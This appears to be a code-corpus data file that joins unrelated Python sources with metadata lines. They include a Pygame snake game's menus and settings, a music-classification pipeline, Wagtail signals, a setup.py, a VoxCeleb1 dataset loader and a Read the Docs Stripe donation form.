self.buttons['Single'] = self.display_text('Single Player', height / 10, WHITE, (width / 3, 4.5 * height / 7))
self.buttons['Multi'] = self.display_text('Multi Player', height / 10, WHITE, (2 * width / 3, 4.5 * height / 7))
self.buttons['Settings'] = self.display_text(' Settings ', height / 10, BLACK, (width / 3, 6 * height / 7), WHITE)
self.buttons['Leaderboard'] = self.display_text(' Leaderboard ', height / 10, BLACK, (2 * width / 3, 6 * height / 7), WHITE)
class Leaderboard(Page):
def __init__(self, width, height, surface):
super(Leaderboard, self).__init__(width, height, surface)
self.display_text('Leaderboard:', height / 6, YELLOW, (width / 2, 2 * height / 7))
difficulty = ['Easy', 'Normal', 'Hard']
for i in range (1, 4):
self.display_text(str(i) + '.', height / 10, BLUE, (width / 12, height / 2 + (i + 1) * height / 10))
self.display_text(difficulty[i - 1], height / 8, RED, (i * width / 4, height / 2))
self.scores = {
DIFFICULTY['Easy']: [],
DIFFICULTY['Normal']: [],
DIFFICULTY['Hard']: []
}
self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, (width / 16, 5 * height / 36))
def update(self):
super(Leaderboard, self).update()
width = self.surface.get_width()
height = self.surface.get_height()
score = self.scores[DIFFICULTY['Easy']]
for i in range(0, min(len(score), 3)):
self.display_text(str(score[i]), height / 10, WHITE, (width / 4, height / 2 + (i + 2) * height / 10))
score = self.scores[DIFFICULTY['Normal']]
for i in range(0, min(len(score), 3)):
self.display_text(str(score[i]), height / 10, WHITE, (width / 2, height / 2 + (i + 2) * height / 10))
score = self.scores[DIFFICULTY['Hard']]
for i in range(0, min(len(score), 3)):
self.display_text(str(score[i]), height / 10, WHITE, (3 * width / 4, height / 2 + (i + 2) * height / 10))
class Settings(Page):
def __init__(self, width, height, surface):
super(Settings, self).__init__(width, height, surface)
self.display_text('Difficulty:', height / 7, WHITE, (width / 3, 2 * height / 6))
self.display_text('Controls:', height / 7, WHITE, (width / 3 - width / 70, 7 * height / 12))
self.display_text('Audio:', height / 7, WHITE, (width / 3 - width / 20, 5 * height / 6))
self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, (width / 16, 5 * height / 36))
self.difficulty = 1
self.controls = 0
self.sound = True
self.music = True
self.loadSettings()
pygame.mixer.music.set_volume(1 if self.music else 0)
def update(self):
super(Settings, self).update()
width = self.surface.get_width()
height = self.surface.get_height()
key = list(DIFFICULTY.keys())[self.difficulty]
self.buttons['Difficulty'] = self.display_text(' ' + key + ' ', height / 7, RED, (7 * width / 10, 2 * height / 6), BLACK)
self.buttons['Controls'] = self.display_text(' ' + CONTROLS[self.controls] + ' ', height / 7, RED, (7 * width / 10, 7 * height / 12), BLACK)
self.buttons['Music'] = self.display_text(' Music ', height / 9, WHITE if self.music else RED, (4 * width / 5, 5 * height / 6 - height / 50), RED if self.music else BLACK)
self.buttons['Sound'] = self.display_text(' Sound ', height / 9, WHITE if self.sound else RED, (3 * width / 5, 5 * height / 6 - height / 50), RED if self.sound else BLACK)
def loadSettings(self):
try:
with open('resources/.settings', 'r') as f:
for line in f:
settings = line.split(':')
if settings[0] == 'Difficulty':
self.difficulty = int(settings[1][:-1])
elif settings[0] == 'Controls':
self.controls = int(settings[1][:-1])
elif settings[0] == 'Music':
self.music = settings[1][:-1] == 'True'
elif settings[0] == 'Sound':
self.sound = settings[1][:-1] == 'True'
except:
pass
def saveSettings(self):
with open('resources/.settings', 'w') as f:
f.write('Difficulty:' + str(self.difficulty) + '\n')
f.write('Controls:' + str(self.controls) + '\n')
f.write('Music:' + str(self.music) + '\n')
f.write('Sound:' + str(self.sound) + '\n')
class GameField(Page):
def __init__(self, width, height, cell_size, surface):
super(GameField, self).__init__(width, height, surface)
self.cell_size = cell_size
self.game = None
def update(self):
super(GameField, self).update()
self.surface.fill(BLACK)
width = self.surface.get_width()
height = self.surface.get_height()
if not self.game == None:
rect = self.display_text('Python: ' + str(self.game.snakes[0].score), height / 10, BLUE, (width / 8, height / 7), BLACK)
self.display_text('x' + str(self.game.snakes[0].lives), height / 16, BLUE, (rect.right + width / 30, height / 7 - height / 100), BLACK)
# if len(self.game.snakes) == 2:
# rect = self.display_text('Viper: ' + str(self.game.snakes[1].score), height / 10, GREEN, (width / 1.13, height / 7))
# self.display_text('x' + str(self.game.snakes[1].lives), height / 16, GREEN, (rect.left - width / 40, height / 7 - height / 100))
self.game.drawSnakes(self.surface, self.cell_size)
if self.game.controls == CONTROLS.index('Touch'):
if self.game.snakes[0].direction % 2 == 0:
self.buttons['Up'] = Rect(0, 0, width, height / 2)
self.buttons['Down'] = Rect(0, height / 2, width, height / 2)
self.buttons['Left'] = Rect(0, 0, 0, 0)
self.buttons['Right'] = Rect(0, 0, 0, 0)
else:
self.buttons['Left'] = Rect(0, 0, width / 2, height)
self.buttons['Right'] = Rect(width / 2, 0, width / 2, height)
self.buttons['Up'] = Rect(0, 0, 0, 0)
self.buttons['Down'] = Rect(0, 0, 0, 0)
elif self.game.controls == CONTROLS.index('Buttons'):
pointlist = [
(width / 5 - height / 14, 5 * height / 7 - height / 28),
(width / 5, 4 * height / 7 - height / 28),
(width / 5 + height / 14, 5 * height / 7 - height / 28)
]
self.buttons['Up'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(width / 5 - height / 14, 5 * height / 7 + height / 28),
(width / 5, 6 * height / 7 + height / 28),
(width / 5 + height / 14, 5 * height / 7 + height / 28)
]
self.buttons['Down'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(4 * width / 5 - height / 28, 5 * height / 7 + height / 14),
(4 * width / 5 - height / 28 - height / 7, 5 * height / 7),
(4 * width / 5 - height / 28, 5 * height / 7 - height / 14)
]
self.buttons['Left'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(4 * width / 5 + height / 28, 5 * height / 7 + height / 14),
(4 * width / 5 + height / 28 + height / 7, 5 * height / 7),
(4 * width / 5 + height / 28, 5 * height / 7 - height / 14)
]
self.buttons['Right'] = pygame.draw.polygon(self.surface, GREY, pointlist)
elif self.game.controls == CONTROLS.index('Inverted'):
pointlist = [
(4 * width / 5 - height / 14, 5 * height / 7 - height / 28),
(4 * width / 5, 4 * height / 7 - height / 28),
(4 * width / 5 + height / 14, 5 * height / 7 - height / 28)
]
self.buttons['Up'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(4 * width / 5 - height / 14, 5 * height / 7 + height / 28),
(4 * width / 5, 6 * height / 7 + height / 28),
(4 * width / 5 + height / 14, 5 * height / 7 + height / 28)
]
self.buttons['Down'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(width / 5 - height / 28, 5 * height / 7 + height / 14),
(width / 5 - height / 28 - height / 7, 5 * height / 7),
(width / 5 - height / 28, 5 * height / 7 - height / 14)
]
self.buttons['Left'] = pygame.draw.polygon(self.surface, GREY, pointlist)
pointlist = [
(width / 5 + height / 28, 5 * height / 7 + height / 14),
(width / 5 + height / 28 + height / 7, 5 * height / 7),
(width / 5 + height / 28, 5 * height / 7 - height / 14)
]
self.buttons['Right'] = pygame.draw.polygon(self.surface, GREY, pointlist)
class Pause(Page):
def __init__(self, width, height, surface, game_surface):
super(Pause, self).__init__(width, height, surface)
self.surface.fill(WHITE)
self.game_surface = game_surface
self.game_surface.set_alpha(220)
self.surface.blit(self.game_surface, (0, 0))
self.display_text('Paused', height / 4, YELLOW, (width / 2, height / 2))
self.buttons['Menu'] = self.display_text('Back to Menu', height / 8, RED, (5 * width / 16, 3 * height / 4))
self.buttons['Unpause'] = self.display_text('Resume', height / 8, GREEN, (11 * width / 16, 3 * height / 4))
class NotImplementedPage(Page):
def __init__(self, width, height, surface):
super(NotImplementedPage, self).__init__(width, height, surface)
self.display_text('Feature not yet implemented', height / 8, RED, (width / 2, 4 * height / 7))
self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, (width / 16, 5 * height / 36))
class GameOver(Page):
def __init__(self, width, height, game, scores, surface):
super(GameOver, self).__init__(width, height, surface)
self.game = game
self.scores = scores
self.display_text('Game Over!', height / 4, RED, (width / 2, 2 * height / 6))
if not self.game == None:
if len(self.game.snakes) == 1:
self.display_text('Score: ' + str(self.game.snakes[0].score), height / 8, GREEN, (width / 2, height / 2))
self.display_text('Leaderboard:', height / 10, WHITE, (width / 2, 4 * height / 7 + height / 10))
self.scores.append(self.game.snakes[0].score)
self.scores = list(set(self.scores))
self.scores.sort(reverse=True)
for i in range(0, min(len(self.scores), 3)):
self.display_text(str(i + 1) + '. ', height / 15, GREEN if self.scores[i] == self.game.snakes[0].score else WHITE, (3 * width / 7, 4 * height / 7 + (i + 2) * height / 11))
self.display_text(str(self.scores[i]), height / 15, GREEN if self.scores[i] == self.game.snakes[0].score else WHITE, (4 * width / 7, 4 * height / 7 + (i + 2) * height / 11))
else:
pass
# total = []
# self.display_text('Score:', height / 15, BLUE, (width / 6, 3 * height / 7))
# self.display_text(str(self.game.snakes[0].score), height / 15, BLUE, (2 * width / 6, 3 * height / 7))
# self.display_text('Lives:', height / 15, BLUE, (width / 6, 4 * height / 7))
# self.display_text(str(self.game.snakes[0].lives * 20), height / 15, BLUE, (2 * width / 6, 4 * height / 7))
# pygame.draw.line(self.surface, WHITE, (width / 8, 4 * height / 7 + height / 30), (3 * width / 8, 4 * height / 7 + height / 30), 8)
# total.append(self.game.snakes[0].score + self.game.snakes[0].lives * 20)
# self.display_text('Total:', height / 15, BLUE, (width / 6, 5 * height / 7))
# self.display_text(str(total[0]), height / 15, BLUE, (2 * width / 6, 5 * height / 7))
# self.display_text('Score:', height / 15, GREEN, (4 * width / 6, 3 * height / 7))
# self.display_text(str(self.game.snakes[1].score), height / 15, GREEN, (5 * width / 6, 3 * height / 7))
# self.display_text('Lives:', height / 15, GREEN, (4 * width / 6, 4 * height / 7))
# self.display_text(str(self.game.snakes[1].lives * 20), height / 15, GREEN, (5 * width / 6, 4 * height / 7))
# pygame.draw.line(self.surface, WHITE, (5 * width / 8, 4 * height / 7 + height / 30), (7 * width / 8, 4 * height / 7 + height / 30), 8)
# total.append(self.game.snakes[1].score + self.game.snakes[1].lives * 20)
# self.display_text('Total:', height / 15, GREEN, (4 * width / 6, 5 * height / 7))
# self.display_text(str(total[1]), height / 15, GREEN, (5 * width / 6, 5 * height / 7))
# if total[0] > total[1]:
# self.display_text('Python Won!', height / 8, BLUE, (width / 2, 17 * height / 18))
# elif total[0] < total[1]:
# self.display_text('Viper Won!', height / 8, GREEN, (width / 2, 17 * height / 18))
# else:
# self.display_text('Draw!', height / 8, YELLOW, (width / 2, 17 * height / 18))
self.buttons['Menu'] = self.display_text('Return', height / 10, WHITE, (width / 7, 17 * height / 18))
self.buttons['Restart'] = self.display_text('Restart', height / 10, WHITE, (6 * width / 7, 17 * height / 18))
class UserInterface:
clock = pygame.time.Clock()
def __init__(self, width, height, cell_size):
self.screen = pygame.display.set_mode((width, height), pygame.HWSURFACE)
self.game = None
self.pages = {}
self.pages['Settings'] = Settings(width, height, self.screen)
self.pages['Menu'] = Menu(width, height, self.screen)
self.current_page = None
self.update_flag = True
self.state = None
def fadeBetweenSurfaces(self, surface):
for i in range(0, 255, ANIMATION_SPEED):
surface.set_alpha(i)
self.screen.blit(surface, (0,0))
pygame.display.flip()
def changePage(self, page):
if self.current_page == 'GameOver' and len(self.game.snakes) == 1:
self.saveLeaderboard(self.pages[self.current_page].scores, self.game.fps)
elif self.current_page == 'Settings':
self.pages[self.current_page].saveSettings()
self.playMusic(page)
self.current_page = page
self.update()
def handleGame(self):
self.clock.tick(self.game.fps)
python_flag = False
for event in pygame.event.get():
if event.type == QUIT:
return False
elif event.type == APP_TERMINATING:
return False
elif event.type == APP_WILLENTERBACKGROUND:
self.pages['Pause'] = Pause(width, height, self.screen, self.screen.copy())
self.changePage('Pause')
self.state = self.screen.copy()
return True
elif event.type == KEYDOWN:
if event.key == pygame_sdl2.K_AC_BACK:
pressed = 'Pause'
elif event.type == FINGERDOWN:
pressed = self.pages[self.current_page].getButton(event.x, event.y)
else:
continue
if pressed == 'Menu':
self.pages['Confirm'] = Confirm(width, height, self.screen, self.screen.copy())
self.changePage('Confirm')
elif pressed == 'Pause':
self.pages['Pause'] = Pause(width, height, self.screen, self.screen.copy())
self.changePage('Pause')
elif pressed == 'Up' and not python_flag:
if self.game.snakes[0].changeDirection(3):
python_flag = True
elif pressed == 'Down' and not python_flag:
if self.game.snakes[0].changeDirection(1):
python_flag = True
elif pressed == 'Left' and not python_flag:
if self.game.snakes[0].changeDirection(2):
python_flag = True
elif pressed == 'Right' and not python_flag:
if self.game.snakes[0].changeDirection(0):
python_flag = True
else:
continue
if not self.game.updateSnakes():
self.pages['GameOver'] = GameOver(self.screen.get_width(), self.screen.get_height(), self.game, self.loadLeaderboard(self.game.fps), self.screen)
self.changePage('GameOver')
return True
def handle(self):
while True:
event = pygame.event.wait()
if event.type == QUIT:
return False
elif event.type == APP_TERMINATING:
return False
elif event.type == APP_WILLENTERBACKGROUND:
self.state = self.screen.copy()
return True
elif event.type == APP_DIDENTERFOREGROUND:
self.screen = pygame.display.set_mode((width, height), pygame.HWSURFACE)
self.pages['Game'] = GameField(width, height, cell_size, self.screen)
self.pages['Game'].game = self.game
self.screen.blit(self.state, (0, 0))
pygame.display.flip()
return True
elif event.type == KEYDOWN:
if event.key == pygame_sdl2.K_AC_BACK:
if self.current_page == 'Menu':
return False
else:
pressed = 'Menu'
break
elif event.type == FINGERDOWN:
pressed = self.pages[self.current_page].getButton(event.x, event.y)
break
else:
continue
if pressed == 'Single':
self.game = Game(1, list(DIFFICULTY.values())[self.pages['Settings'].difficulty], self.pages['Settings'].controls)
self.pages['Game'] = GameField(width, height, cell_size, self.screen)
self.pages['Game'].game = self.game
self.changePage('Game')
elif pressed == 'Multi':
# self.game = Game(2, EASY if self.pages['Settings'].easy else HARD)
# self.pages['Game'].game = self.game
# self.pages['GameOver'].game = self.game
# self.changePage('Game')
self.pages['NotImplemented'] = NotImplementedPage(width, height, self.screen)
self.changePage('NotImplemented')
elif pressed == 'Settings':
self.pages['Settings'] = Settings(width, height, self.screen)
self.changePage('Settings')
elif pressed == 'Leaderboard':
self.pages['Leaderboard'] = Leaderboard(width, height, self.screen)
self.pages['Leaderboard'].scores[DIFFICULTY['Easy']] = self.loadLeaderboard(DIFFICULTY['Easy'])
self.pages['Leaderboard'].scores[DIFFICULTY['Normal']] = self.loadLeaderboard(DIFFICULTY['Normal'])
self.pages['Leaderboard'].scores[DIFFICULTY['Hard']] = self.loadLeaderboard(DIFFICULTY['Hard'])
self.changePage('Leaderboard')
elif pressed == 'Difficulty':
self.pages['Settings'].difficulty = (self.pages['Settings'].difficulty + 1) % 3
elif pressed == 'Controls':
self.pages['Settings'].controls = (self.pages['Settings'].controls + 1) % len(CONTROLS)
elif pressed == 'Sound':
self.pages['Settings'].sound = not self.pages['Settings'].sound
for sound in SOUNDS.values():
sound.set_volume(1 if self.pages['Settings'].sound else 0)
elif pressed == 'Music':
self.pages['Settings'].music = not self.pages['Settings'].music
pygame.mixer.music.set_volume(1 if self.pages['Settings'].music else 0)
elif pressed == 'Menu':
self.pages['Menu'] = Menu(width, height, self.screen)
self.changePage('Menu')
elif pressed == 'Unpause':
self.changePage('Game')
elif pressed == 'Yes':
self.pages['Menu'] = Menu(width, height, self.screen)
self.changePage('Menu')
elif pressed == 'No':
self.changePage('Game')
elif pressed == 'Restart':
self.game = self.game.restart()
self.pages['Game'] = GameField(width, height, cell_size, self.screen)
self.pages['Game'].game = self.game
self.changePage('Game')
elif pressed == 'Quit':
return False
else:
self.update_flag = False
return True
def update(self):
self.pages[self.current_page].update()
pygame.display.flip()
def playMusic(self, page):
if not self.current_page == 'Settings' and not self.current_page == 'NotImplemented' and not self.current_page == 'Leaderboard':
if page == 'Game':
if self.current_page == 'Pause':
pygame.mixer.music.unpause()
else:
pygame.mixer.music.load(MUSIC[self.game.fps])
pygame.mixer.music.play(loops=-1)
elif page == 'Pause':
pygame.mixer.music.pause()
elif not page == 'Settings' and not page == 'NotImplemented' and not page == 'Leaderboard':
pygame.mixer.music.load(MUSIC[page])
pygame.mixer.music.play(loops=-1)
def loadLeaderboard(self, difficulty):
scores = []
try:
if difficulty == DIFFICULTY['Easy']:
file = 'resources/.easy'
elif difficulty == DIFFICULTY['Normal']:
file = 'resources/.normal'
elif difficulty == DIFFICULTY['Hard']:
file = 'resources/.hard'
with open(file, 'r') as f:
for line in f:
scores.append(int(line.strip()))
except:
scores = []
return scores
def saveLeaderboard(self, scores, difficulty):
if difficulty == DIFFICULTY['Easy']:
file = 'resources/.easy'
elif difficulty == DIFFICULTY['Normal']:
file = 'resources/.normal'
elif difficulty == DIFFICULTY['Hard']:
file = 'resources/.hard'
with open(file, 'w') as f:
for s in scores[:3]:
f.write(str(s) + '\n')
# Init
pygame.init()
pygame.display.set_caption('Python vs Android')
# Colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREY = (255, 255, 255, 80)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
CYAN = (0, 255, 255)
MAGENTA = (255, 0, 255)
APPLE_COLORS = {
AppleTypes.NORMAL : RED,
AppleTypes.GOLDEN : YELLOW,
AppleTypes.LIFE : MAGENTA,
AppleTypes.SPECIAL : CYAN
}
# FPS
DIFFICULTY = {
'Easy' : 15,
'Normal' : 25,
'Hard': 35
}
# Controls
CONTROLS = ['Touch', 'Buttons', 'Inverted']
# Music
MUSIC = {
'Menu' : 'resources/intro.wav',
DIFFICULTY['Easy'] : 'resources/easy.wav',
DIFFICULTY['Normal'] : 'resources/normal.wav',
DIFFICULTY['Hard'] : 'resources/hard.wav',
'Pause' : None,
'Confirm' : None,
'GameOver' : 'resources/game_over.wav'
}
# Sounds
SOUNDS = {
'Apple' : pygame.mixer.Sound('resources/apple.wav'),
'Golden' : pygame.mixer.Sound('resources/golden.wav'),
'Life' : pygame.mixer.Sound('resources/life.wav'),
'Special' : pygame.mixer.Sound('resources/special.wav'),
'Hit' : pygame.mixer.Sound('resources/hit.wav'),
}
# Utils
ANIMATION_SPEED = 20
APPLE_EXPIRATION = 120
SNAKE_EXPIRATION = 40
SPECIAL_FRAMES = 3
# Adapt size to screen
width = pygame.display.Info().current_w
height = pygame.display.Info().current_h
CELL_COUNT_Y = 36
cell_size = int(height / CELL_COUNT_Y)
CELL_COUNT_X = int(width / cell_size)
ui = UserInterface(width, height, cell_size)
ui.changePage('Menu')
running = True
# Loop
while running:
if ui.current_page == 'Game':
running = ui.handleGame()
else:
running = ui.handle()
if ui.update_flag:
ui.update()
else:
ui.update_flag = True
else:
ui.pages['Settings'].saveSettings()
# Quit
pygame.quit()
| 2.9375 | 3 |
main.py | slimtomatillo/major_or_minor_song_classification | 8 | 12765102 | # Functions
from extract import extract
from model import model
import os
# Logging
import logging
logging.basicConfig(level=logging.INFO)
# Set directory
dir = '/Users/alexandrasmith/ds/metis/proj3_mcnulty/PROJ_FILES/major_or_minor_song_classification'
# filepath_to_music --> Edit as needed
filepath = 'sample_music_files'
# desired_clip_length --> Edit as needed (suggested: 30)
clip_sec = 30
# path_for_sliced_clips --> Edit as needed
export_path = 'sample_music_files_sliced'
def main(filepath_to_music, desired_clip_length, path_for_sliced_clips):
"""
Function that takes in music files,
extracts audio features, creates
pandas df, transforms data for
modeling, builds models, stores
performance of models
Takes in (1) a filepath to where the
music is stored, (2) the desired clip
length to build the models on, and (3)
the path to store the sliced clips
(which can be deleted after csv is
exported
:param filepath_to_music: str
:param desired_clip_length: int
:param path_for_sliced_clips: str
:return: None, exported df as csv,
exported df of models and performance
"""
global dir
logging.info('Extracting features...')
# Call extract() on filepath_to_music
data = extract(filepath_to_music, desired_clip_length, path_for_sliced_clips)
logging.info('Done with extraction.')
# Check if folder exists, if not, make it
if not os.path.exists(dir):
os.mkdir(dir)
# Export dataframe as csv
data.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_data.csv'), index=False)
logging.info('Data exported to csv.')
logging.info('Building models...')
# Call model on extracted files
model_perf, holdout_perf = model(os.path.join(dir, f'{desired_clip_length}_sec_data.csv'))
# Export dataframes of performance as csv
model_perf.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_performance.csv'), index=False)
holdout_perf.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_holdout.csv'), index=False)
logging.info('Finished.')
return
if __name__ == '__main__':
main(filepath, clip_sec, export_path)
| 3.046875 | 3 |
wagtail/core/signals.py | smartfactory-gmbh/wagtail | 8,851 | 12765103 | <reponame>smartfactory-gmbh/wagtail
from django.dispatch import Signal
# Page signals
# provides args: instance, revision
page_published = Signal()
# provides args: instance
page_unpublished = Signal()
# provides args: instance, parent_page_before, parent_page_after, url_path_before, url_path_after
pre_page_move = Signal()
# provides args: instance, parent_page_before, parent_page_after, url_path_before, url_path_after
post_page_move = Signal()
# Workflow signals
# provides args: instance, user
workflow_approved = Signal()
# provides args: instance, user
workflow_rejected = Signal()
# provides args: instance, user
workflow_cancelled = Signal()
# provides args: instance, user
workflow_submitted = Signal()
# Workflow task signals
# provides args: instance, user
task_approved = Signal()
# provides args: instance, user
task_rejected = Signal()
# provides args: instance, user
task_submitted = Signal()
# provides args: instance, user
task_cancelled = Signal()
# Locale signals
# Like pre_delete, but sent on deletion before on_delete validation is applied.
# Currently only sent by the Locale model.
# Required as a workaround for https://code.djangoproject.com/ticket/6870
# provides args: sender, instance
pre_validate_delete = Signal()
| 1.679688 | 2 |
setup.py | ojarva/flask-restful-url-generator | 3 | 12765104 | <filename>setup.py
"""
Packaging for flask-restful-url-generator
"""
from os import path
from codecs import open as codecs_open
from setuptools import setup
CURRENT_PATH = path.abspath(path.dirname(__file__))
with codecs_open(path.join(CURRENT_PATH, 'README.rst'), encoding='utf-8') as f:
LONG_DESCRIPTION = f.read()
setup(
name='flask_restful_url_generator',
version='0.0.1',
description='flask-restful URLs list',
long_description=LONG_DESCRIPTION,
url='https://github.com/ojarva/flask-restful-url-generator',
author='<NAME>',
author_email='<EMAIL>',
license='BSD',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: PyPy',
],
keywords='flask restful',
packages=["flask_restful_url_generator"],
install_requires=['flask_restful'],
extras_require={
'dev': ['twine', 'wheel'],
},
)
| 1.476563 | 1 |
sugar/data/voxceleb1.py | mechanicalsea/sugar | 4 | 12765105 | """
Description: Dataset from VoxCeleb1
Author: <NAME>
Date: 2020.11.26
VoxCeleb1:
- From iden_split.txt to the training and validation set.
- From iden_split.txt to evaulate the identification task.
- From veri_test2.txt, list_test_all2.txt, and list_test_hard2.txt to
evaluate the corresponding verification task.
File Directory: voxceleb1/{speaker_id}/{utterance_id}/*.wav
Indices List:
- Speaker Identification: iden_split.txt
- Speaker Verification: veri_test2.txt, list_test_hard2.txt, list_test_all2.txt
List Template:
- iden_split.txt
| 3 | id10003/na8-QEFmj44/00003.wav |
| 1 | id10003/tCq2LcKO6xY/00002.wav |
| 1 | id10003/K5zRxtXc27s/00001.wav |
- veri_test2.txt, list_test_hard2.txt, list_test_all2.txt
| 1 | id10001/Y8hIVOBuels/00001.wav | id10001/1zcIwhmdeo4/00001.wav |
| 0 | id10001/Y8hIVOBuels/00001.wav | id10943/vNCVj7yLWPU/00005.wav |
| 1 | id10001/Y8hIVOBuels/00001.wav | id10001/7w0IBEWc9Qw/00004.wav |
"""
import os
from sugar.database import Utterance
from sugar.database import VerificationTrials
__all__ = ['idenset', 'veriset', 'veritrain']
idenlist = '/workspace/datasets/voxceleb/Vox1/iden_split.txt'
rootdir = '/workspace/datasets/voxceleb/voxceleb1'
verilist = '/workspace/datasets/voxceleb/Vox1/veri_split.txt' # create as the official mentioned
veritest2 = '/workspace/datasets/voxceleb/Vox2/veri_test2.txt'
veriall2 = '/workspace/datasets/voxceleb/Vox2/list_test_all2.txt'
verihard2 = '/workspace/datasets/voxceleb/Vox2/list_test_hard2.txt'
def idenset(listfile=idenlist, rootdir=rootdir, read_func=None, num_samples=48000, num_eval=2, is_xvector=True):
"""
Load VoxCeleb1 training set, and identification test set.
iden_split.txt to the training, validaton, and test sets.
Return
------
train : Utterance
val : Utterance
test : Utterance
spks : dict
is_xvector : bool
'x-vector' or 'd-vector'
"""
TRAIN_TYPE = 1
VAL_TYPE = 2
TEST_TYPE = 3
datalst = []
spks = []
with open(listfile, 'r') as f:
while True:
line = f.readline()
if not line:
break
line = line.replace('\n', '')
split_type, wav_path = line.split(' ')
spks.append(wav_path.split('/')[0])
split_type = int(split_type)
wav_path = os.path.join(rootdir, wav_path)
datalst.append([split_type, wav_path])
# create speaker dictionary
spks = list(set(spks))
spks.sort()
spks = {spk: idx for idx, spk in enumerate(spks)}
print('The "read" method of dataset is', read_func)
# split train part
trainlst = [wav for t, wav in datalst if t == TRAIN_TYPE]
# split validation part
vallst = [wav for t, wav in datalst if t == VAL_TYPE]
# split test part
testlst = [wav for t, wav in datalst if t == TEST_TYPE]
# convert list to Utterance
train = Utterance(trainlst, num_samples)
val = Utterance(vallst, num_samples)
test = Utterance(testlst, num_samples if not is_xvector else 0, True, num_eval)
return train, val, test, spks
def veriset(test2=veritest2, all2=veriall2, hard2=verihard2, rootdir=rootdir, num_samples=48000, num_eval=2):
"""
Load VoxCeleb1 verification test set.
1. veri_test2.txt to test2,
2. list_test_hard2.txt to hard2,
3. list_test_all2.txt to all2.
These list file has the same root directory.
Return
------
veri_test2 : VerificationTrials
veri_all2 : VerificationTrials
veri_hard2 : VerificationTrials
wav_files : Utterance
Notes
-----
Utterance and VerificationTrials are both Dataset.
VerificationTrials:
{'label': int, 'enroll': str, 'test': str}
Utterance:
{'file': str, 'input': Tensor}
By try-and-error, 2 x 5-second segments is better within 20 seconds.
"""
# load multiple trials list
veri_test2 = VerificationTrials(test2, num_samples, True, num_eval, rootdir)
veri_hard2 = VerificationTrials(hard2, num_samples, True, num_eval, rootdir) if hard2 is not None and os.path.exists(hard2) else None
veri_all2 = VerificationTrials(all2, num_samples, True, num_eval, rootdir) if all2 is not None and os.path.exists(all2) else None
# create unique file list, and then convert to be a Utterance
wav_files = set()
for veri in [veri_test2, veri_hard2, veri_all2]:
if veri is not None:
wav_files |= set(veri.files)
wav_files = list(wav_files)
wav_files = Utterance(wav_files, num_samples, True, num_eval)
return veri_test2, veri_all2, veri_hard2, wav_files
def veritrain(listfile=verilist, rootdir=rootdir, num_samples=48000):
train, _, _, spks = idenset(listfile, rootdir, num_samples)
return train, spks
if __name__ == '__main__':
veri_test2, veri_all2, veri_hard2, wav_files = veriset()
print('# of utterances in Vox1-O: {:,}'.format(len(veri_test2.files)))
print('# of utterances in Vox1-E: {:,}'.format(len(veri_all2.files)))
print('# of utterances in Vox1-H: {:,}'.format(len(veri_hard2.files)))
print('# of utterances in Vox1-E/H: {:,}'.format(len(set(veri_all2.files) | set(veri_hard2.files))))
print('# of speakers in Vox1-O: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_test2.files]))))
print('# of speakers in Vox1-E: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_all2.files]))))
print('# of speakers in Vox1-H: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_hard2.files]))))
print('# of speakers in Vox1-E/H: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_all2.files]) | \
set([utt.split('/')[-3] for utt in veri_hard2.files]))))
print(1)
| 1.773438 | 2 |
readthedocs/donate/forms.py | ardalis/readthedocs.org | 1 | 12765106 | import logging
from django import forms
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
import stripe
from .models import Supporter
log = logging.getLogger(__name__)
class SupporterForm(forms.ModelForm):
class Meta:
model = Supporter
fields = (
'last_4_digits',
'stripe_id',
'name',
'email',
'dollars',
'logo_url',
'site_url',
'public',
)
labels = {
'public': _('Make this donation public'),
}
help_texts = {
'public': _('Your name and image will be displayed on the donation page'),
'email': _('Your email is used for Gravatar and so we can send you a receipt'),
'logo_url': _("URL of your company's logo, images should be 300x300 pixels or less"),
'dollars': _('Companies donating over $400 can specify a logo URL and site link'),
}
widgets = {
'dollars': forms.Select(attrs={
'data-bind': 'value: dollars'
}),
'logo_url': forms.TextInput(attrs={
'data-bind': 'value: logo_url, enable: urls_enabled'
}),
'site_url': forms.TextInput(attrs={
'data-bind': 'value: site_url, enable: urls_enabled'
})
}
last_4_digits = forms.CharField(widget=forms.HiddenInput(), required=True)
stripe_id = forms.CharField(widget=forms.HiddenInput(), required=True)
def __init__(self, *args, **kwargs):
self.user = kwargs.pop('user')
super(SupporterForm, self).__init__(*args, **kwargs)
def clean(self):
'''Call stripe for payment (not ideal here) and clean up logo < $200'''
dollars = self.cleaned_data['dollars']
if dollars < 200:
self.cleaned_data['logo_url'] = None
self.cleaned_data['site_url'] = None
try:
stripe.api_key = settings.STRIPE_SECRET
stripe.Charge.create(
amount=int(self.cleaned_data['dollars']) * 100,
currency='usd',
source=self.cleaned_data['stripe_id'],
description='Read the Docs Sustained Engineering',
receipt_email=self.cleaned_data['email']
)
except stripe.error.CardError, e:
stripe_error = e.json_body['error']
log.error('Credit card error: %s', stripe_error['message'])
raise forms.ValidationError(
_('There was a problem processing your card: %(message)s'),
params=stripe_error)
return self.cleaned_data
def save(self, commit=True):
supporter = super(SupporterForm, self).save(commit)
if commit and self.user is not None and self.user.is_authenticated():
supporter.user = self.user
supporter.save()
return supporter
| 2.171875 | 2 |
src/who_is_on_my_wifi.py | tucnakomet1/Python-Who-Is-On-My-WiFi | 19 | 12765107 | from scapy.all import *
from device import *
from who import *
